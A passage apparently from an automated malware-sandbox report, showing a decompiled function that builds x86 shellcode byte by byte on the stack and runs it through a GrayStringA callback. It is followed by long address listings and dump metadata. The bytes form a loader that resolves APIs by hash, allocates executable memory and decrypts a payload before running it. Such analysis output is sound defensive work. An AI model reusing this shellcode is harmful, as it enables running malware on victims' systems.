				_v582 = 0x48;
				_v581 = 0x24;
				_v580 = 3;
				_v579 = 0xdf;
				_v578 = 0x8b;
				_v577 = 0x40;
				_v576 = 0x18;
				_v575 = 3;
				_v574 = 0xcf;
				_v573 = 0x89;
				_v572 = 0x55;
				_v571 = 0xfc;
				_v570 = 0x89;
				_v569 = 0x4d;
				_v568 = 0xf8;
				_v567 = 0x89;
				_v566 = 0x45;
				_v565 = 8;
				_v564 = 0x85;
				_v563 = 0xc0;
				_v562 = 0x74;
				_v561 = 0x1a;
				_v560 = 0x8b;
				_v559 = 4;
				_v558 = 0xb2;
				_v557 = 3;
				_v556 = 0xc7;
				_v555 = 0x50;
				_v554 = 0xe8;
				_v553 = 0x96;
				_v552 = 0xff;
				_v551 = 0xff;
				_v550 = 0xff;
				_v549 = 0x59;
				_v548 = 0x3b;
				_v547 = 0x45;
				_v546 = 0xc;
				_v545 = 0x74;
				_v544 = 0x12;
				_v543 = 0x8b;
				_v542 = 0x55;
				_v541 = 0xfc;
				_v540 = 0x46;
				_v539 = 0x3b;
				_v538 = 0x75;
				_v537 = 8;
				_v536 = 0x72;
				_v535 = 0xe6;
				_v534 = 0x33;
				_v533 = 0xc0;
				_v532 = 0x5f;
				_v531 = 0x5e;
				_v530 = 0x5b;
				_v529 = 0x8b;
				_v528 = 0xe5;
				_v527 = 0x5d;
				_v526 = 0xc3;
				_v525 = 0x8b;
				_v524 = 0x45;
				_v523 = 0xf8;
				_v522 = 0xf;
				_v521 = 0xb7;
				_v520 = 4;
				_v519 = 0x70;
				_v518 = 0x8b;
				_v517 = 4;
				_v516 = 0x83;
				_v515 = 3;
				_v514 = 0xc7;
				_v513 = 0xeb;
				_v512 = 0xeb;
				_v511 = 0x55;
				_v510 = 0x8b;
				_v509 = 0xec;
				_v508 = 0x81;
				_v507 = 0xec;
				_v506 = 0x24;
				_v505 = 4;
				_v504 = 0;
				_v503 = 0;
				_v502 = 0x53;
				_v501 = 0x56;
				_v500 = 0x57;
				_v499 = 0x64;
				_v498 = 0xa1;
				_v497 = 0x30;
				_v496 = 0;
				_v495 = 0;
				_v494 = 0;
				_v493 = 0x8b;
				_v492 = 0x40;
				_v491 = 0xc;
				_v490 = 0x8b;
				_v489 = 0x40;
				_v488 = 0xc;
				_v487 = 0x8b;
				_v486 = 0;
				_v485 = 0x8b;
				_v484 = 0;
				_v483 = 0x8b;
				_v482 = 0x40;
				_v481 = 0x18;
				_v480 = 0x8b;
				_v479 = 0xf0;
				_v478 = 0x33;
				_v477 = 0xdb;
				_v476 = 0x68;
				_v475 = 0x43;
				_v474 = 0xb7;
				_v473 = 0xba;
				_v472 = 0xdd;
				_v471 = 0x56;
				_v470 = 0x89;
				_v469 = 0x5d;
				_v468 = 0xec;
				_v467 = 0xe8;
				_v466 = 0x69;
				_v465 = 0xff;
				_v464 = 0xff;
				_v463 = 0xff;
				_v462 = 0x68;
				_v461 = 0x7a;
				_v460 = 0xb8;
				_v459 = 0xce;
				_v458 = 0x7b;
				_v457 = 0x56;
				_v456 = 0x8b;
				_v455 = 0xf8;
				_v454 = 0xe8;
				_v453 = 0x5c;
				_v452 = 0xff;
				_v451 = 0xff;
				_v450 = 0xff;
				_v449 = 0x68;
				_v448 = 0xc9;
				_v447 = 0xf1;
				_v446 = 0xad;
				_v445 = 0xe7;
				_v444 = 0x56;
				_v443 = 0x89;
				_v442 = 0x45;
				_v441 = 0xf8;
				_v440 = 0xe8;
				_v439 = 0x4e;
				_v438 = 0xff;
				_v437 = 0xff;
				_v436 = 0xff;
				_v435 = 0x68;
				_v434 = 8;
				_v433 = 0x2c;
				_v432 = 0xd9;
				_v431 = 0xf6;
				_v430 = 0x56;
				_v429 = 0x89;
				_v428 = 0x45;
				_v427 = 0xfc;
				_v426 = 0xe8;
				_v425 = 0x40;
				_v424 = 0xff;
				_v423 = 0xff;
				_v422 = 0xff;
				_v421 = 0x68;
				_v420 = 0x34;
				_v419 = 0x2e;
				_v418 = 0xdd;
				_v417 = 0x96;
				_v416 = 0x56;
				_v415 = 0x89;
				_v414 = 0x45;
				_v413 = 0xf4;
				_v412 = 0xe8;
				_v411 = 0x32;
				_v410 = 0xff;
				_v409 = 0xff;
				_v408 = 0xff;
				_v407 = 0x83;
				_v406 = 0xc4;
				_v405 = 0x28;
				_v404 = 0x89;
				_v403 = 0x45;
				_v402 = 0xf0;
				_v401 = 0x8d;
				_v400 = 0x85;
				_v399 = 0xdc;
				_v398 = 0xfb;
				_v397 = 0xff;
				_v396 = 0xff;
				_v395 = 0x68;
				_v394 = 3;
				_v393 = 1;
				_v392 = 0;
				_v391 = 0;
				_v390 = 0x50;
				_v389 = 0x53;
				_v388 = 0xff;
				_v387 = 0xd7;
				_v386 = 0x85;
				_v385 = 0xc0;
				_v384 = 0xf;
				_v383 = 0x84;
				_v382 = 0x47;
				_v381 = 1;
				_v380 = 0;
				_v379 = 0;
				_v378 = 0x53;
				_v377 = 0x68;
				_v376 = 0x80;
				_v375 = 0;
				_v374 = 0;
				_v373 = 0;
				_v372 = 0x6a;
				_v371 = 3;
				_v370 = 0x53;
				_v369 = 0x6a;
				_v368 = 7;
				_v367 = 0x68;
				_v366 = 0;
				_v365 = 0;
				_v364 = 0;
				_v363 = 0x80;
				_v362 = 0x8d;
				_v361 = 0x85;
				_v360 = 0xdc;
				_v359 = 0xfb;
				_v358 = 0xff;
				_v357 = 0xff;
				_v356 = 0x50;
				_v355 = 0xff;
				_v354 = 0x55;
				_v353 = 0xfc;
				_v352 = 0x89;
				_v351 = 0x45;
				_v350 = 0xfc;
				_v349 = 0x83;
				_v348 = 0xf8;
				_v347 = 0xff;
				_v346 = 0xf;
				_v345 = 0x84;
				_v344 = 0x21;
				_v343 = 1;
				_v342 = 0;
				_v341 = 0;
				_v340 = 0x53;
				_v339 = 0x50;
				_v338 = 0xff;
				_v337 = 0x55;
				_v336 = 0xf4;
				_v335 = 0x8b;
				_v334 = 0xf8;
				_v333 = 0x83;
				_v332 = 0xff;
				_v331 = 0xff;
				_v330 = 0xf;
				_v329 = 0x84;
				_v328 = 0x11;
				_v327 = 1;
				_v326 = 0;
				_v325 = 0;
				_v324 = 0x6a;
				_v323 = 4;
				_v322 = 0x68;
				_v321 = 0;
				_v320 = 0x30;
				_v319 = 0;
				_v318 = 0;
				_v317 = 0x57;
				_v316 = 0x53;
				_v315 = 0xff;
				_v314 = 0x55;
				_v313 = 0xf8;
				_v312 = 0x8b;
				_v311 = 0xf0;
				_v310 = 0x85;
				_v309 = 0xf6;
				_v308 = 0xf;
				_v307 = 0x84;
				_v306 = 0xfb;
				_v305 = 0;
				_v304 = 0;
				_v303 = 0;
				_v302 = 0x53;
				_v301 = 0x8d;
				_v300 = 0x45;
				_v299 = 0xec;
				_v298 = 0x50;
				_v297 = 0x57;
				_v296 = 0x56;
				_v295 = 0xff;
				_v294 = 0x75;
				_v293 = 0xfc;
				_v292 = 0xff;
				_v291 = 0x55;
				_v290 = 0xf0;
				_v289 = 0x85;
				_v288 = 0xc0;
				_v287 = 0xf;
				_v286 = 0x84;
				_v285 = 0xe6;
				_v284 = 0;
				_v283 = 0;
				_v282 = 0;
				_v281 = 0x8b;
				_v280 = 0x46;
				_v279 = 0x3c;
				_v278 = 3;
				_v277 = 0xc6;
				_v276 = 0xf;
				_v275 = 0xb7;
				_v274 = 0x48;
				_v273 = 6;
				_v272 = 0x8b;
				_v271 = 0x50;
				_v270 = 0x54;
				_v269 = 0x89;
				_v268 = 0x55;
				_v267 = 0xfc;
				_v266 = 0x85;
				_v265 = 0xc9;
				_v264 = 0x74;
				_v263 = 0x19;
				_v262 = 0xf;
				_v261 = 0xb7;
				_v260 = 0x50;
				_v259 = 0x14;
				_v258 = 0x83;
				_v257 = 0xc2;
				_v256 = 0x28;
				_v255 = 3;
				_v254 = 0xc2;
				_v253 = 0x8b;
				_v252 = 0x55;
				_v251 = 0xfc;
				_v250 = 3;
				_v249 = 0x10;
				_v248 = 0x8d;
				_v247 = 0x40;
				_v246 = 0x28;
				_v245 = 0x83;
				_v244 = 0xe9;
				_v243 = 1;
				_v242 = 0x75;
				_v241 = 0xf6;
				_v240 = 0x89;
				_v239 = 0x55;
				_v238 = 0xfc;
				_v237 = 0x6a;
				_v236 = 0x40;
				_v235 = 0xb8;
				_v234 = 0xac;
				_v233 = 0x15;
				_v232 = 0;
				_v231 = 0;
				_v230 = 0x2b;
				_v229 = 0xfa;
				_v228 = 0x68;
				_v227 = 0;
				_v226 = 0x30;
				_v225 = 0;
				_v224 = 0;
				_v223 = 0x50;
				_v222 = 0x53;
				_v221 = 0x2b;
				_v220 = 0xf8;
				_v219 = 0xff;
				_v218 = 0x55;
				_v217 = 0xf8;
				_v216 = 3;
				_v215 = 0x75;
				_v214 = 0xfc;
				_v213 = 0x68;
				_v212 = 0xac;
				_v211 = 0x15;
				_v210 = 0;
				_v209 = 0;
				_v208 = 0x56;
				_v207 = 0x50;
				_v206 = 0x89;
				_v205 = 0x45;
				_v204 = 0xf0;
				_v203 = 0xe8;
				_v202 = 0x9a;
				_v201 = 0;
				_v200 = 0;
				_v199 = 0;
				_v198 = 0x83;
				_v197 = 0xc4;
				_v196 = 0xc;
				_v195 = 0x6a;
				_v194 = 0x40;
				_v193 = 0x68;
				_v192 = 0;
				_v191 = 0x30;
				_v190 = 0;
				_v189 = 0;
				_v188 = 0x57;
				_v187 = 0x53;
				_v186 = 0xff;
				_v185 = 0x55;
				_v184 = 0xf8;
				_v183 = 0x57;
				_v182 = 0x8d;
				_v181 = 0x8e;
				_v180 = 0xac;
				_v179 = 0x15;
				_v178 = 0;
				_v177 = 0;
				_v176 = 0x89;
				_v175 = 0x45;
				_v174 = 0xf4;
				_v173 = 0x51;
				_v172 = 0x50;
				_v171 = 0xe8;
				_v170 = 0x7a;
				_v169 = 0;
				_v168 = 0;
				_v167 = 0;
				_v166 = 0x8b;
				_v165 = 0x75;
				_v164 = 0xf0;
				_v163 = 0x83;
				_v162 = 0xc4;
				_v161 = 0xc;
				_v160 = 0x8d;
				_v159 = 0x14;
				_v158 = 0x33;
				_v157 = 0x8a;
				_v156 = 0xcb;
				_v155 = 0x2a;
				_v154 = 0xa;
				_v153 = 0x8a;
				_v152 = 0xc3;
				_v151 = 0x80;
				_v150 = 0xf1;
				_v149 = 0x76;
				_v148 = 0xf6;
				_v147 = 0xd9;
				_v146 = 0x80;
				_v145 = 0xf1;
				_v144 = 0x75;
				_v143 = 0xf6;
				_v142 = 0xd9;
				_v141 = 0x32;
				_v140 = 0xcb;
				_v139 = 0xd0;
				_v138 = 0xc9;
				_v137 = 0x80;
				_v136 = 0xf1;
				_v135 = 0x88;
				_v134 = 0xf6;
				_v133 = 0xd1;
				_v132 = 0x32;
				_v131 = 0xcb;
				_v130 = 0x80;
				_v129 = 0xe9;
				_v128 = 0x13;
				_v127 = 0x80;
				_v126 = 0xf1;
				_v125 = 0xfd;
				_v124 = 0x2a;
				_v123 = 0xcb;
				_v122 = 0xd0;
				_v121 = 0xc1;
				_v120 = 0x80;
				_v119 = 0xc1;
				_v118 = 0x79;
				_v117 = 0x80;
				_v116 = 0xf1;
				_v115 = 0x31;
				_v114 = 2;
				_v113 = 0xcb;
				_v112 = 0xf6;
				_v111 = 0xd1;
				_v110 = 0x2a;
				_v109 = 0xcb;
				_v108 = 0x80;
				_v107 = 0xf1;
				_v106 = 0xb5;
				_v105 = 0xd0;
				_v104 = 0xc9;
				_v103 = 0x2a;
				_v102 = 0xc1;
				_v101 = 0x8a;
				_v100 = 0xcb;
				_v99 = 0x32;
				_v98 = 0xc3;
				_v97 = 0x2a;
				_v96 = 0xc8;
				_v95 = 0xb0;
				_v94 = 0xf;
				_v93 = 0x80;
				_v92 = 0xc1;
				_v91 = 0x2f;
				_v90 = 0x80;
				_v89 = 0xf1;
				_v88 = 0x35;
				_v87 = 0xfe;
				_v86 = 0xc1;
				_v85 = 0x32;
				_v84 = 0xcb;
				_v83 = 0x80;
				_v82 = 0xe9;
				_v81 = 0x62;
				_v80 = 0x32;
				_v79 = 0xcb;
				_v78 = 2;
				_v77 = 0xcb;
				_v76 = 0x80;
				_v75 = 0xf1;
				_v74 = 0x79;
				_v73 = 0x2a;
				_v72 = 0xc1;
				_v71 = 0xc0;
				_v70 = 0xc0;
				_v69 = 3;
				_v68 = 0x43;
				_v67 = 0x88;
				_v66 = 2;
				_v65 = 0x81;
				_v64 = 0xfb;
				_v63 = 0xac;
				_v62 = 0x15;
				_v61 = 0;
				_v60 = 0;
				_v59 = 0x72;
				_v58 = 0x99;
				_v57 = 0xff;
				_v56 = 0x75;
				_v55 = 0xf4;
				_v54 = 0xff;
				_v53 = 0xd6;
				_v52 = 0x59;
				_v51 = 0x5f;
				_v50 = 0x5e;
				_v49 = 0x5b;
				_v48 = 0x8b;
				_v47 = 0xe5;
				_v46 = 0x5d;
				_v45 = 0xc3;
				_v44 = 0x55;
				_v43 = 0x8b;
				_v42 = 0xec;
				_v41 = 0x8b;
				_v40 = 0x55;
				_v39 = 0x10;
				_v38 = 0x85;
				_v37 = 0xd2;
				_v36 = 0x74;
				_v35 = 0x15;
				_v34 = 0x8b;
				_v33 = 0x4d;
				_v32 = 8;
				_v31 = 0x56;
				_v30 = 0x8b;
				_v29 = 0x75;
				_v28 = 0xc;
				_v27 = 0x2b;
				_v26 = 0xf1;
				_v25 = 0x8a;
				_v24 = 4;
				_v23 = 0xe;
				_v22 = 0x88;
				_v21 = 1;
				_v20 = 0x41;
				_v19 = 0x83;
				_v18 = 0xea;
				_v17 = 1;
				_v16 = 0x75;
				_v15 = 0xf5;
				_v14 = 0x5e;
				_v13 = 0x5d;
				_v12 = 0xc3;
				_v11 = 0;
				_v10 = 0;
				_v9 = 0;
				_v8 = 0;
				_t658 = GrayStringA(GetDC(0), 0,  &_v660,  &_v1660, 0, 0, 0, 0, 0); // executed
				return _t658;
			}


















































































































































































































































































































































































































































































































































































































































































                                                                        0x00401009
                                                                        0x00401010
                                                                        0x00401017
                                                                        0x0040101e
                                                                        0x00401025
                                                                        0x0040102c
                                                                        0x00401033
                                                                        0x0040103a
                                                                        0x00401041
                                                                        0x00401048
                                                                        0x0040104f
                                                                        0x00401056
                                                                        0x0040105d
                                                                        0x00401064
                                                                        0x0040106b
                                                                        0x00401072
                                                                        0x00401079
                                                                        0x00401080
                                                                        0x00401087
                                                                        0x0040108e
                                                                        0x00401095
                                                                        0x0040109c
                                                                        0x004010a3
                                                                        0x004010aa
                                                                        0x004010b1
                                                                        0x004010b8
                                                                        0x004010bf
                                                                        0x004010c6
                                                                        0x004010cd
                                                                        0x004010d4
                                                                        0x004010db
                                                                        0x004010e2
                                                                        0x004010e9
                                                                        0x004010f0
                                                                        0x004010f7
                                                                        0x004010fe
                                                                        0x00401105
                                                                        0x0040110c
                                                                        0x00401113
                                                                        0x0040111a
                                                                        0x00401121
                                                                        0x00401128
                                                                        0x0040112f
                                                                        0x00401136
                                                                        0x0040113d
                                                                        0x00401144
                                                                        0x0040114b
                                                                        0x00401152
                                                                        0x00401159
                                                                        0x00401160
                                                                        0x00401167
                                                                        0x0040116e
                                                                        0x00401175
                                                                        0x0040117c
                                                                        0x00401183
                                                                        0x0040118a
                                                                        0x00401191
                                                                        0x00401198
                                                                        0x0040119f
                                                                        0x004011a6
                                                                        0x004011ad
                                                                        0x004011b4
                                                                        0x004011bb
                                                                        0x004011c2
                                                                        0x004011c9
                                                                        0x004011d0
                                                                        0x004011d7
                                                                        0x004011de
                                                                        0x004011e5
                                                                        0x004011ec
                                                                        0x004011f3
                                                                        0x004011fa
                                                                        0x00401201
                                                                        0x00401208
                                                                        0x0040120f
                                                                        0x00401216
                                                                        0x0040121d
                                                                        0x00401224
                                                                        0x0040122b
                                                                        0x00401232
                                                                        0x00401239
                                                                        0x00401240
                                                                        0x00401247
                                                                        0x0040124e
                                                                        0x00401255
                                                                        0x0040125c
                                                                        0x00401263
                                                                        0x0040126a
                                                                        0x00401271
                                                                        0x00401278
                                                                        0x0040127f
                                                                        0x00401286
                                                                        0x0040128d
                                                                        0x00401294
                                                                        0x0040129b
                                                                        0x004012a2
                                                                        0x004012a9
                                                                        0x004012b0
                                                                        0x004012b7
                                                                        0x004012be
                                                                        0x004012c5
                                                                        0x004012cc
                                                                        0x004012d3
                                                                        0x004012da
                                                                        0x004012e1
                                                                        0x004012e8
                                                                        0x004012ef
                                                                        0x004012f6
                                                                        0x004012fd
                                                                        0x00401304
                                                                        0x0040130b
                                                                        0x00401312
                                                                        0x00401319
                                                                        0x00401320
                                                                        0x00401327
                                                                        0x0040132e
                                                                        0x00401335
                                                                        0x0040133c
                                                                        0x00401343
                                                                        0x0040134a
                                                                        0x00401351
                                                                        0x00401358
                                                                        0x0040135f
                                                                        0x00401366
                                                                        0x0040136d
                                                                        0x00401374
                                                                        0x0040137b
                                                                        0x00401382
                                                                        0x00401389
                                                                        0x00401390
                                                                        0x00401397
                                                                        0x0040139e
                                                                        0x004013a5
                                                                        0x004013ac
                                                                        0x004013b3
                                                                        0x004013ba
                                                                        0x004013c1
                                                                        0x004013c8
                                                                        0x004013cf
                                                                        0x004013d6
                                                                        0x004013dd
                                                                        0x004013e4
                                                                        0x004013eb
                                                                        0x004013f2
                                                                        0x004013f9
                                                                        0x00401400
                                                                        0x00401407
                                                                        0x0040140e
                                                                        0x00401415
                                                                        0x0040141c
                                                                        0x00401423
                                                                        0x0040142a
                                                                        0x00401431
                                                                        0x00401438
                                                                        0x0040143f
                                                                        0x00401446
                                                                        0x0040144d
                                                                        0x00401454
                                                                        0x0040145b
                                                                        0x00401462
                                                                        0x00401469
                                                                        0x00401470
                                                                        0x00401477
                                                                        0x0040147e
                                                                        0x00401485
                                                                        0x0040148c
                                                                        0x00401493
                                                                        0x0040149a
                                                                        0x004014a1
                                                                        0x004014a8
                                                                        0x004014af
                                                                        0x004014b6
                                                                        0x004014bd
                                                                        0x004014c4
                                                                        0x004014cb
                                                                        0x004014d2
                                                                        0x004014d9
                                                                        0x004014e0
                                                                        0x004014e7
                                                                        0x004014ee
                                                                        0x004014f5
                                                                        0x004014fc
                                                                        0x00401503
                                                                        0x0040150a
                                                                        0x00401511
                                                                        0x00401518
                                                                        0x0040151f
                                                                        0x00401526
                                                                        0x0040152d
                                                                        0x00401534
                                                                        0x0040153b
                                                                        0x00401542
                                                                        0x00401549
                                                                        0x00401550
                                                                        0x00401557
                                                                        0x0040155e
                                                                        0x00401565
                                                                        0x0040156c
                                                                        0x00401573
                                                                        0x0040157a
                                                                        0x00401581
                                                                        0x00401588
                                                                        0x0040158f
                                                                        0x00401596
                                                                        0x0040159d
                                                                        0x004015a4
                                                                        0x004015ab
                                                                        0x004015b2
                                                                        0x004015b9
                                                                        0x004015c0
                                                                        0x004015c7
                                                                        0x004015ce
                                                                        0x004015d5
                                                                        0x004015dc
                                                                        0x004015e3
                                                                        0x004015ea
                                                                        0x004015f1
                                                                        0x004015f8
                                                                        0x004015ff
                                                                        0x00401606
                                                                        0x0040160d
                                                                        0x00401614
                                                                        0x0040161b
                                                                        0x00401622
                                                                        0x00401629
                                                                        0x00401630
                                                                        0x00401637
                                                                        0x0040163e
                                                                        0x00401645
                                                                        0x0040164c
                                                                        0x00401653
                                                                        0x0040165a
                                                                        0x00401661
                                                                        0x00401668
                                                                        0x0040166f
                                                                        0x00401676
                                                                        0x0040167d
                                                                        0x00401684
                                                                        0x0040168b
                                                                        0x00401692
                                                                        0x00401699
                                                                        0x004016a0
                                                                        0x004016a7
                                                                        0x004016ae
                                                                        0x004016b5
                                                                        0x004016bc
                                                                        0x004016c3
                                                                        0x004016ca
                                                                        0x004016d1
                                                                        0x004016d8
                                                                        0x004016df
                                                                        0x004016e6
                                                                        0x004016ed
                                                                        0x004016f4
                                                                        0x004016fb
                                                                        0x00401702
                                                                        0x00401709
                                                                        0x00401710
                                                                        0x00401717
                                                                        0x0040171e
                                                                        0x00401725
                                                                        0x0040172c
                                                                        0x00401733
                                                                        0x0040173a
                                                                        0x00401741
                                                                        0x00401748
                                                                        0x0040174f
                                                                        0x00401756
                                                                        0x0040175d
                                                                        0x00401764
                                                                        0x0040176b
                                                                        0x00401772
                                                                        0x00401779
                                                                        0x00401780
                                                                        0x00401787
                                                                        0x0040178e
                                                                        0x00401795
                                                                        0x0040179c
                                                                        0x004017a3
                                                                        0x004017aa
                                                                        0x004017b1
                                                                        0x004017b8
                                                                        0x004017bf
                                                                        0x004017c6
                                                                        0x004017cd
                                                                        0x004017d4
                                                                        0x004017db
                                                                        0x004017e2
                                                                        0x004017e9
                                                                        0x004017f0
                                                                        0x004017f7
                                                                        0x004017fe
                                                                        0x00401805
                                                                        0x0040180c
                                                                        0x00401813
                                                                        0x0040181a
                                                                        0x00401821
                                                                        0x00401828
                                                                        0x0040182f
                                                                        0x00401836
                                                                        0x0040183d
                                                                        0x00401844
                                                                        0x0040184b
                                                                        0x00401852
                                                                        0x00401859
                                                                        0x00401860
                                                                        0x00401867
                                                                        0x0040186e
                                                                        0x00401875
                                                                        0x0040187c
                                                                        0x00401883
                                                                        0x0040188a
                                                                        0x00401891
                                                                        0x00401898
                                                                        0x0040189f
                                                                        0x004018a6
                                                                        0x004018ad
                                                                        0x004018b4
                                                                        0x004018bb
                                                                        0x004018c2
                                                                        0x004018c9
                                                                        0x004018d0
                                                                        0x004018d7
                                                                        0x004018de
                                                                        0x004018e5
                                                                        0x004018ec
                                                                        0x004018f3
                                                                        0x004018fa
                                                                        0x00401901
                                                                        0x00401908
                                                                        0x0040190f
                                                                        0x00401916
                                                                        0x0040191d
                                                                        0x00401924
                                                                        0x0040192b
                                                                        0x00401932
                                                                        0x00401939
                                                                        0x00401940
                                                                        0x00401947
                                                                        0x0040194e
                                                                        0x00401955
                                                                        0x0040195c
                                                                        0x00401963
                                                                        0x0040196a
                                                                        0x00401971
                                                                        0x00401978
                                                                        0x0040197f
                                                                        0x00401986
                                                                        0x0040198d
                                                                        0x00401994
                                                                        0x0040199b
                                                                        0x004019a2
                                                                        0x004019a9
                                                                        0x004019b0
                                                                        0x004019b7
                                                                        0x004019be
                                                                        0x004019c5
                                                                        0x004019cc
                                                                        0x004019d3
                                                                        0x004019da
                                                                        0x004019e1
                                                                        0x004019e8
                                                                        0x004019ef
                                                                        0x004019f6
                                                                        0x004019fd
                                                                        0x00401a04
                                                                        0x00401a0b
                                                                        0x00401a12
                                                                        0x00401a19
                                                                        0x00401a20
                                                                        0x00401a27
                                                                        0x00401a2e
                                                                        0x00401a35
                                                                        0x00401a3c
                                                                        0x00401a43
                                                                        0x00401a4a
                                                                        0x00401a51
                                                                        0x00401a58
                                                                        0x00401a5f
                                                                        0x00401a66
                                                                        0x00401a6d
                                                                        0x00401a74
                                                                        0x00401a7b
                                                                        0x00401a82
                                                                        0x00401a89
                                                                        0x00401a90
                                                                        0x00401a97
                                                                        0x00401a9e
                                                                        0x00401aa5
                                                                        0x00401aac
                                                                        0x00401ab3
                                                                        0x00401aba
                                                                        0x00401ac1
                                                                        0x00401ac8
                                                                        0x00401acf
                                                                        0x00401ad6
                                                                        0x00401add
                                                                        0x00401ae4
                                                                        0x00401aeb
                                                                        0x00401af2
                                                                        0x00401af9
                                                                        0x00401b00
                                                                        0x00401b07
                                                                        0x00401b0e
                                                                        0x00401b15
                                                                        0x00401b1c
                                                                        0x00401b23
                                                                        0x00401b2a
                                                                        0x00401b31
                                                                        0x00401b38
                                                                        0x00401b3f
                                                                        0x00401b46
                                                                        0x00401b4d
                                                                        0x00401b54
                                                                        0x00401b5b
                                                                        0x00401b62
                                                                        0x00401b69
                                                                        0x00401b70
                                                                        0x00401b77
                                                                        0x00401b7e
                                                                        0x00401b85
                                                                        0x00401b8c
                                                                        0x00401b93
                                                                        0x00401b9a
                                                                        0x00401ba1
                                                                        0x00401ba8
                                                                        0x00401baf
                                                                        0x00401bb6
                                                                        0x00401bbd
                                                                        0x00401bc4
                                                                        0x00401bcb
                                                                        0x00401bd2
                                                                        0x00401bd9
                                                                        0x00401be0
                                                                        0x00401be7
                                                                        0x00401bee
                                                                        0x00401bf5
                                                                        0x00401bfc
                                                                        0x00401c03
                                                                        0x00401c0a
                                                                        0x00401c11
                                                                        0x00401c18
                                                                        0x00401c1f
                                                                        0x00401c26
                                                                        0x00401c2d
                                                                        0x00401c34
                                                                        0x00401c3b
                                                                        0x00401c42
                                                                        0x00401c49
                                                                        0x00401c50
                                                                        0x00401c57
                                                                        0x00401c5e
                                                                        0x00401c65
                                                                        0x00401c6c
                                                                        0x00401c73
                                                                        0x00401c7a
                                                                        0x00401c81
                                                                        0x00401c88
                                                                        0x00401c8f
                                                                        0x00401c96
                                                                        0x00401c9d
                                                                        0x00401ca4
                                                                        0x00401cab
                                                                        0x00401cb2
                                                                        0x00401cb9
                                                                        0x00401cc0
                                                                        0x00401cc7
                                                                        0x00401cce
                                                                        0x00401cd5
                                                                        0x00401cdc
                                                                        0x00401ce3
                                                                        0x00401cea
                                                                        0x00401cf1
                                                                        0x00401cf8
                                                                        0x00401cff
                                                                        0x00401d06
                                                                        0x00401d0d
                                                                        0x00401d14
                                                                        0x00401d1b
                                                                        0x00401d22
                                                                        0x00401d29
                                                                        0x00401d30
                                                                        0x00401d37
                                                                        0x00401d3e
                                                                        0x00401d45
                                                                        0x00401d4c
                                                                        0x00401d53
                                                                        0x00401d5a
                                                                        0x00401d61
                                                                        0x00401d68
                                                                        0x00401d6f
                                                                        0x00401d76
                                                                        0x00401d7d
                                                                        0x00401d84
                                                                        0x00401d8b
                                                                        0x00401d92
                                                                        0x00401d99
                                                                        0x00401da0
                                                                        0x00401da7
                                                                        0x00401dae
                                                                        0x00401db5
                                                                        0x00401dbc
                                                                        0x00401dc3
                                                                        0x00401dca
                                                                        0x00401dd1
                                                                        0x00401dd8
                                                                        0x00401ddf
                                                                        0x00401de6
                                                                        0x00401ded
                                                                        0x00401df4
                                                                        0x00401dfb
                                                                        0x00401e02
                                                                        0x00401e09
                                                                        0x00401e10
                                                                        0x00401e17
                                                                        0x00401e1e
                                                                        0x00401e25
                                                                        0x00401e2c
                                                                        0x00401e33
                                                                        0x00401e3a
                                                                        0x00401e41
                                                                        0x00401e48
                                                                        0x00401e4f
                                                                        0x00401e56
                                                                        0x00401e5d
                                                                        0x00401e64
                                                                        0x00401e6b
                                                                        0x00401e72
                                                                        0x00401e79
                                                                        0x00401e7d
                                                                        0x00401e81
                                                                        0x00401e85
                                                                        0x00401e89
                                                                        0x00401e8d
                                                                        0x00401e91
                                                                        0x00401e95
                                                                        0x00401e99
                                                                        0x00401e9d
                                                                        0x00401ea1
                                                                        0x00401ea5
                                                                        0x00401ea9
                                                                        0x00401ead
                                                                        0x00401eb1
                                                                        0x00401eb5
                                                                        0x00401eb9
                                                                        0x00401ebd
                                                                        0x00401ec1
                                                                        0x00401ec5
                                                                        0x00401ec9
                                                                        0x00401ecd
                                                                        0x00401ed1
                                                                        0x00401ed5
                                                                        0x00401ed9
                                                                        0x00401edd
                                                                        0x00401ee1
                                                                        0x00401ee5
                                                                        0x00401ee9
                                                                        0x00401eed
                                                                        0x00401ef1
                                                                        0x00401ef5
                                                                        0x00401ef9
                                                                        0x00401efd
                                                                        0x00401f01
                                                                        0x00401f05
                                                                        0x00401f09
                                                                        0x00401f0d
                                                                        0x00401f11
                                                                        0x00401f15
                                                                        0x00401f19
                                                                        0x00401f1d
                                                                        0x00401f21
                                                                        0x00401f25
                                                                        0x00401f29
                                                                        0x00401f2d
                                                                        0x00401f31
                                                                        0x00401f35
                                                                        0x00401f39
                                                                        0x00401f3d
                                                                        0x00401f41
                                                                        0x00401f45
                                                                        0x00401f49
                                                                        0x00401f4d
                                                                        0x00401f51
                                                                        0x00401f55
                                                                        0x00401f59
                                                                        0x00401f5d
                                                                        0x00401f61
                                                                        0x00401f65
                                                                        0x00401f69
                                                                        0x00401f6d
                                                                        0x00401f71
                                                                        0x00401f75
                                                                        0x00401f79
                                                                        0x00401f7d
                                                                        0x00401f81
                                                                        0x00401f85
                                                                        0x00401f89
                                                                        0x00401f8d
                                                                        0x00401f91
                                                                        0x00401f95
                                                                        0x00401f99
                                                                        0x00401f9d
                                                                        0x00401fa1
                                                                        0x00401fa5
                                                                        0x00401fa9
                                                                        0x00401fad
                                                                        0x00401fb1
                                                                        0x00401fb5
                                                                        0x00401fb9
                                                                        0x00401fbd
                                                                        0x00401fc1
                                                                        0x00401fc5
                                                                        0x00401fc9
                                                                        0x00401fcd
                                                                        0x00401fd1
                                                                        0x00401fd5
                                                                        0x00401fd9
                                                                        0x00401fdd
                                                                        0x00401fe1
                                                                        0x00401fe5
                                                                        0x00401fe9
                                                                        0x00401fed
                                                                        0x00401ff1
                                                                        0x00401ff5
                                                                        0x00401ff9
                                                                        0x00401ffd
                                                                        0x00402001
                                                                        0x00402005
                                                                        0x00402009
                                                                        0x0040200d
                                                                        0x00402011
                                                                        0x00402015
                                                                        0x00402019
                                                                        0x0040201d
                                                                        0x00402021
                                                                        0x00402025
                                                                        0x00402029
                                                                        0x0040202d
                                                                        0x00402031
                                                                        0x00402035
                                                                        0x00402039
                                                                        0x0040203d
                                                                        0x00402041
                                                                        0x00402045
                                                                        0x00402049
                                                                        0x0040204d
                                                                        0x00402051
                                                                        0x00402055
                                                                        0x00402059
                                                                        0x0040205d
                                                                        0x00402061
                                                                        0x00402065
                                                                        0x00402069
                                                                        0x00402090
                                                                        0x00402099

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00402089
                                                                        • GrayStringA.USER32(00000000), ref: 00402090
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.248212405.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
